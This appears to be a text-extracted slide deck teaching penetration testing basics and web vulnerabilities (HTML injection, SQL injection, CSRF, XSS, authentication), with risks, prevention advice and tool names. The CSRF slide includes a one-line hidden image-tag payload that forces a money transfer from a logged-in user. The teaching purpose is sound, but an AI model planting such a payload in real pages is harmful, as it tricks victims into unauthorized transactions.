Penetration

Testing

"Protection of computer systems and data from digital threats."

 C y b e r S e c u r i t y

AGENDA

• Penetration Testing
• Popular Vulnerabilities:
▪ HTML Injection
▪ SQL Injection
▪ CSRF
▪ XSS
▪ Login Authentication
 C y b e r S e c u r i t y

What is Penetration Testing

• Penetration testing, also known as pen testing,

identifies vulnerabilities in systems, networks, or
applications.
• It can be conducted manually or through
automated software tools.
• The process involves gathering information, finding
entry points, attempting breaches, and reporting
findings.
• The main goal is to uncover security weaknesses.
 C y b e r S e c u r i t y

Penetration Testing Phases

Reference: https://www.extnoc.com/learn/general/penetration-testing
 C y b e r S e c u r i t y

HTML Injection

• HTML Injection is a security vulnerability that allows

attackers to inject HTML tags into a web page, altering its
content or appearance.
• It differs from Cross-Site Scripting (XSS) because only certain
HTML tags can be injected, not JavaScript code.

Types:
• Stored: Injected code is saved on the server and
displayed to multiple users.
• Reflected: Injected code appears only in a single request.
 C y b e r S e c u r i t y

HTML Injection - Risks & Mitigation

• Risks:
• Content Manipulation: Alters page layout, misleading users.
• Phishing & Data Theft: Fake forms trick users into submitting
data.
• Trust Exploitation: Social engineering leverages user trust.

• Prevention:
• Input Validation & Sanitization: Filter and validate user inputs.
• CSP: Restrict content sources with Content Security Policy.
• Encoding: Encode outputs to prevent HTML rendering.
 C y b e r S e c u r i t y

SQL Injection

• SQL injection is a code injection technique, used to

attack data-driven applications, in which malicious
SQL statements are inserted into an entry field for
execution.
• This is a method to attack web applications that
have a data repository.
• The attacker would send a specially crafted SQL
statement that is designed to cause some
malicious action.
 C y b e r S e c u r i t y

How SQL Injection works?

• The ability to inject SQL commands into the

database engine through an existing application.
• SQL injection is the use of publicly available fields
to gain entry to your database.
• This is done by entering SQL commands into your
form fields instead of the expected data.
• Improperly coded forms will allow a hacker to use
them as an entry point to your database.
 C y b e r S e c u r i t y

How SQL Injection works?

• App sends form to user.

• Attacker submits form with SQL exploit data.
• Application builds string with exploit data.
• Application sends SQL query to DB.
• DB executes query, including exploit, sends
data back to application.
• Application returns data to user.
 C y b e r S e c u r i t y

Defense Against SQL Injection

1. Comprehensive data sanitization: Web sites

must filter all user input.
2. Use a web application firewall: A popular
example is the free, open-source module
ModSecurity which provides a sophisticated and
ever-evolving set of rules to filter potentially
dangerous web requests.
Tools:
• SQL Map
• SQL Sus
• SQLi Dumper
CSRF :
C y b e r S e c u r i t y

What is CSRF?
• CSRF, or Cross-Site Request Forgery, is a web security
vulnerability that tricks a user into performing actions on
a website where they are authenticated. It exploits the
trust a website has in the user’s browser.

• Goal of CSRF: Attackers trick authenticated users into

performing actions they didn’t intend, like changing
settings or making transactions.
 CSRF :
C y b e r S e c u r i t y

How CSRF Works :

Step-by-Step Process:
1. User Login: User logs into a legitimate website (e.g., a
banking site).
2. Attacker's Trap: The attacker crafts a malicious request
and tricks the user into clicking a link or visiting a malicious
page.
3. Request Sent: The user’s browser, still logged in, sends the
attacker’s request to the legitimate site, without the user
realizing it.
4. Action Executed: The server processes the request,
believing it came from the user, leading to unintended
actions.
Eg: Bank Transfer: An attacker sends a malicious link to a user, who,
when clicked, unknowingly transfers money from their account to
the attacker’s account.
CSRF
C y b e r S e c u r i t y

CSRF Example :

• Scenario: Alice is logged into her banking site. Bob (attacker)

sends Alice a link to a malicious webpage.
• Malicious Code Example:
• <img
src="http://bank.com/transfer?to=bob&amount=1000"
style="display:none">

• When Alice clicks the link, her browser sends a request to

the bank, transferring $1000 to Bob.

• The image tag sends a hidden request to Alice’s bank,

Exploiting her authenticated session.

• Another example , that attacker can delete the user

Account and can auto submt form.
CSRF
C y b e r S e c u r i t y

Preventing CSRF :

Protection Techniques:
• CSRF Tokens: Random tokens sent with forms,
verified on the server-side.
• Same-Site Cookies: Restrict cookies to prevent
unauthorized requests.
• User Confirmation: Add confirmation prompts
for sensitive actions.
Tools:
• Burp Suite
• XSRFProbe
 C y b e r S e c u r i t y

XSS

XSS is a security vulnerability that allows

attackers to inject malicious scripts into web
pages viewed by other users.

Primary Goals of XSS:

Data Theft: Attackers use XSS to
Session Hijacking: Gain control Redirection: Redirect users to
steal sensitive information like
over user sessions to malicious websites to perform
cookies, session tokens, and
impersonate the victim. further attacks.
other credentials.
 C y b e r S e c u r i t y
XSS
TYPES OF XSS

Stored XSS: The malicious script is saved on the server (in a database,
comment field, etc.) and is delivered to users whenever they load the
affected page.

Reflected XSS: The injected script is reflected off a web server, such as in a
URL or error message. Often used in phishing attacks.

DOM-based XSS: The vulnerability exists in client-side scripts and doesn’t

involve server-side processing. The injected script modifies the DOM
(Document Object Model) of the webpage directly in the user’s browser.
 C y b e r S e c u r i t y

How XSS Attacks Work

• Step 1: Attacker injects malicious script in input

fields or URLs.
• Step 2: Server processes the data without
proper sanitization.

o Stored XSS: The server saves the script.

When other users visit, they unknowingly
load the script.
o Reflected XSS: The server sends back the
injected script immediately. The victim
sees it if they follow a link or submit a
form.
o DOM-based XSS: The attack code runs
directly in the browser, changing the
page’s content or behavior.
 C y b e r S e c u r i t y

How XSS Attacks Work

• Step 3: The script runs in the victim’s

browser, allowing attackers to steal
sensitive information (like cookies),
Impersonate the victim and redirect to
phishing or malware sites

Tools:
• Burp Suite
• DalFox
• XSStrike
 C y b e r S e c u r i t y

PREVENTION

• Sanitize Inputs: Make sure that

user inputs (comments, form data,
etc.) are “cleaned” so they can’t be
used for XSS. Remove characters
like < and >.
• Encode Outputs: Convert data to a
safe format before showing it on
the page (e.g., replace < with
&lt;).
• Set Content Security Policies
(CSP): Use a CSP to control which
scripts can run on the page and
limit where they can come from.
 C y b e r S e c u r i t y

Login Authentication

• A security process used to confirm the identity of a user

before allowing access to digital resources, such as
applications, accounts, or networks.

• Authentication is a security measure designed to verify

that users are who they claim to be. It acts as a
gatekeeper, preventing unauthorized individuals from
accessing sensitive systems and information, and is
essential for protecting data and maintaining secure
access to digital resources.

Tools:
• Hydra
• Nikto
• John the Ripper
Types of Authentication Methods
•Password-Based Authentication:
• The simplest and most common form of authentication.
• Users enter a unique password to gain access; security depends on
password strength.

•Two-Factor Authentication (2FA):

• Adds an extra layer of security by requiring a second factor, like a code
sent to a device.
• Even if passwords are compromised, 2FA prevents unauthorized access.

•Biometric Authentication:
• Uses unique biological traits (fingerprints, facial recognition) for identity
verification.
• Offers a high level of security, as biometrics are hard to replicate.

•Multi-Factor Authentication (MFA):

• Combines multiple authentication methods (password + fingerprint +
code).
• Provides robust protection, especially for sensitive accounts and systems.
Common Vulnerabilities &
Mitigations
• Common Vulnerabilities:
• Weak Passwords: Users often create simple, guessable
passwords.
• Phishing Attacks: Fake emails or sites trick users into giving
away their credentials.
• Brute-Force Attacks: Attackers use software to repeatedly
guess passwords.
• Session Hijacking: Attackers intercept a user’s session ID to
impersonate them.
• Mitigation Strategies:
• Enforce Strong Password Policies: Require a mix of
characters, symbols, and length.
• Use Two-Factor or Multi-Factor Authentication: Adds layers
to prevent unauthorized access.
• Implement CAPTCHA and Account Lockouts: CAPTCHA
blocks bots, and lockouts prevent brute-force.
• Educate Users on Phishing: Train users to spot fake emails
and login pages to avoid credential theft.
 References

• https://owasp.org/www-project-top-ten/
• https://www.infosecinstitute.com/resources/application-security/best-free-and-open-source-sql-injection-
tools/ext
• https://www.esecurityplanet.com/
• https://www.imperva.com/learn/application-security/html-injection/
• https://portswigger.net/web-security/csrf
• https://www.acunetix.com/websitesecurity/csrf-attacks/
• https://portswigger.net/web-security/cross-site-scripting
• https://portswigger.net/web-security/authentication
Thank You!